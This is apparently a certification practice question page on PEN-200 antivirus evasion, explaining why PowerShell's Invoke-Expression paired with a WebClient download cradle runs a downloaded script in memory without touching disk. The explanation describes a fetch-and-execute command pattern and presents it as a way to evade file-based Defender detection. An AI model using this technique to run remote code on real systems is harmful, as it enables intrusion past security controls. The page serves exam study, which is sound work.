PEN-200 Antivirus Evasion Practice Question
A junior penetration tester is preparing a payload for a Windows 10 target with Windows Defender enabled. The tester wants to avoid writing the payload to disk and decides to use a PowerShell one-liner that downloads and executes a script in memory. Which PowerShell feature allows the script to be executed directly from a downloaded string without saving it to a file?
⚠ Common exam trap
Candidates often confuse cmdlets that can download content with those that can execute PowerShell code directly from a string, such as assuming Start-Process or Import-Module can run a script from a URL.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
Invoke-Expression (IEX) with a downloaded string.
Invoke-Expression takes a string and runs it as PowerShell code. By pairing it with a download cradle, the tester can retrieve a script into memory and execute it without touching disk. This is a standard in-memory execution technique for PowerShell. The other cmdlets either do not execute arbitrary PowerShell code, require local files, or are intended for different purposes such as loading .NET types or modules, so they do not fulfill the requirement.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
Add-Type with a downloaded assembly.
Why it's wrong here
Add-Type compiles and loads .NET source code or assemblies into the current PowerShell session. While it can load an assembly from a byte array, it is designed for .NET types, not for executing a PowerShell script string. Using it for a script would require wrapping the script in a .NET class, which is more complex and not the intended in-memory script execution method. It does not directly evaluate PowerShell code from a downloaded string.
- ✓
Invoke-Expression (IEX) with a downloaded string.
Why this is correct
Invoke-Expression evaluates a string as PowerShell code in the current session. When combined with a download cradle such as (New-Object Net.WebClient).DownloadString('http://...'), the script is fetched into memory and executed immediately, leaving no file on disk. This is a common in-memory execution technique that helps evade file-based detection, though AMSI may still inspect the script content at runtime.
- ✗
Start-Process with the -FilePath parameter pointing to a URL.
Why it's wrong here
Start-Process launches an executable or document from a file path or URL, but it does not interpret PowerShell code. If pointed to a URL, it would attempt to open the resource with the default handler, not execute it as a script in memory. This does not provide in-memory script execution and would likely fail or prompt the user, making it unsuitable for the tester's goal of running a downloaded script without saving it.
- ✗
Import-Module with a URL to a .psm1 file.
Why it's wrong here
Import-Module expects a local file path or a module name, not a URL. It cannot directly download and import a module from the web. Even if a module were downloaded, importing it would load the module's functions but not execute arbitrary script code as a one-liner. This approach does not achieve immediate in-memory execution of a downloaded script and would require additional steps to save the file first.
About these practice questions
One of 285 original PEN-200 practice questions on Courseiva, each with a full explanation and wrong-answer analysis — not exam dumps or protected exam content. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official OffSec exam blueprint
This PEN-200 practice question is part of Courseiva's free OffSec certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PEN-200 exam.